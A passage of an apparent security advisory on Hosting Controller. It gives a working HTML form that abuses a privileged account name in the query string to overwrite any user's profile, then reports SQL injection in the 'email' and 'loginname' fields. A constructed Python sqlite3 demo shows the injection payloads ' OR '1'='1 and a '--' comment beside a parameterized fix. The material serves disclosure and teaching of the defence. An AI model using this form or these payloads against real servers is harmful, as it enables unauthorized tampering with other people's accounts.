4- [Remote Attacker] can change all users' profiles.
4.1- Save the following as "ChangeProfiles.htm", open it in a browser, enter the Hosting Controller base URL (e.g. http://[HC URL]) in the "URL" box, set "loginname" to the victim's username and "email" to the victim's current e-mail address, fill in the profile fields you want to overwrite, and submit the form:
~~~~~~~~~~~~~~~~4.1.1 ChangeProfiles.htm~~~~~~~~~~~~~~~~~~~~~~~~
<script>
// Runs on submit and points the form at the target HC server.
// The "loginname" in the query string names the privileged account the
// request is processed as; the "loginname" in the POST body below names
// the victim whose profile gets overwritten.
function check() {
    var _action = '/Hosting/Addreseller.asp?loginname=ResAdmin';
    // Base URL typed into the box outside the form (stripping any trailing
    // slash so the path is not doubled); document.all was IE-only.
    var base = document.getElementById('URL').value.replace(/\/+$/, '');
    document.forms['frmChangeProfile'].action = base + _action;
    return true;
}
</script>
<!-- Kept outside the form so it is not sent as a POST field. -->
URL: <input type="text" id="URL" name="URL" /><br />
<form name="frmChangeProfile" action="" method="post" onsubmit="return check()">
UserName: <input type="text" name="loginname" value="Victim User" /> <br />
first name: <input type="text" name="first_name" value="" /> <br />
last name: <input type="text" name="last_name" value="" /> <br />
description: <input type="text" name="description" value="" /> <br />
company: <input type="text" name="company" value="" /> <br />
email: <input type="text" name="email" value="User's Actual Email Address" /> <br />
country: <input type="text" name="country" value="" /> <br />
state: <input type="text" name="state" value="" /> <br />
city: <input type="text" name="city" value="" /> <br />
address: <input type="text" name="address" value="" /> <br />
phone: <input type="text" name="phone" value="" /> <br />
fax: <input type="text" name="fax" value="" /> <br />
zip: <input type="text" name="zip" value="" /> <br />
<input type="submit" />
</form>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Note: the "ResAdmin" value in "_action" can be changed to "hcadmin" or any other valid username.
4.2- Now go to: http://[HC URL]/hosting/xml_addresellerresult.asp
4.3- The "email" and "loginname" fields are also vulnerable to SQL injection, so an attacker can change a user's profile without knowing that user's e-mail address either.
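The injection in 4.3 only works because the server puts the submitted "loginname" and "email" straight into the WHERE clause of its UPDATE statement; the advisory does not show that code. The following is an added example written for this page, not Hosting Controller's code: a constructed sqlite3 model of such a handler (the "users" table, its columns, the sample accounts and the payloads are all assumptions) next to a parameterized version. It shows why the e-mail "check" is defeated by a payload in either field, and why an "OR '1'='1'" in the e-mail field rewrites every account at once, which is what "all users' profiles" in the heading amounts to.

```python
import sqlite3

# Constructed sample accounts; the table and columns are an assumption,
# not Hosting Controller's real schema.
SEED_USERS = [
    ("Victim User", "victim@example.invalid", "Vic"),
    ("hcadmin", "admin@example.invalid", "Admin"),
]


def make_db():
    """Fresh in-memory database holding the constructed sample accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (loginname TEXT, email TEXT, first_name TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SEED_USERS)
    conn.commit()
    return conn


def update_profile_vulnerable(conn, loginname, email, first_name):
    """Model of a handler that 'verifies' the caller knows the account's
    e-mail by matching it in the WHERE clause, but builds the statement by
    string concatenation. Returns the number of rows changed."""
    sql = (
        "UPDATE users SET first_name = '" + first_name + "' "
        "WHERE loginname = '" + loginname + "' AND email = '" + email + "'"
    )
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def update_profile_safe(conn, loginname, email, first_name):
    """Same check with bound parameters: the submitted values are only ever
    compared as data, never parsed as SQL."""
    cur = conn.execute(
        "UPDATE users SET first_name = ? WHERE loginname = ? AND email = ?",
        (first_name, loginname, email),
    )
    conn.commit()
    return cur.rowcount


def demo():
    """Run each payload against a fresh database; returns rows changed."""
    results = {}

    # Correct e-mail, no injection: exactly the victim's row is updated.
    results["correct_email"] = update_profile_vulnerable(
        make_db(), "Victim User", "victim@example.invalid", "Changed")

    # Wrong e-mail, no injection: the e-mail check holds, nothing changes.
    results["wrong_email"] = update_profile_vulnerable(
        make_db(), "Victim User", "not-the-email", "Changed")

    # Payload in the email field. The WHERE clause becomes
    #   loginname = 'Victim User' AND email = '' OR '1'='1'
    # which is true for every row, so every profile is overwritten.
    results["email_injected"] = update_profile_vulnerable(
        make_db(), "Victim User", "' OR '1'='1", "Changed")

    # Payload in the loginname field. "--" comments out the e-mail
    # comparison, so the victim's row changes without the e-mail.
    results["loginname_injected"] = update_profile_vulnerable(
        make_db(), "Victim User' --", "not-the-email", "Changed")

    # The parameterized handler still works for the legitimate case ...
    results["safe_correct_email"] = update_profile_safe(
        make_db(), "Victim User", "victim@example.invalid", "Changed")
    # ... and treats both payloads as literal strings matching no account.
    results["safe_email_injected"] = update_profile_safe(
        make_db(), "Victim User", "' OR '1'='1", "Changed")
    results["safe_loginname_injected"] = update_profile_safe(
        make_db(), "Victim User' --", "not-the-email", "Changed")

    return results


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows} row(s) changed")
```

The rowcount is the whole story here: the same two payloads that change one or two rows through the concatenating handler change zero rows through the parameterized one, because the quote and the comment marker never reach the SQL parser.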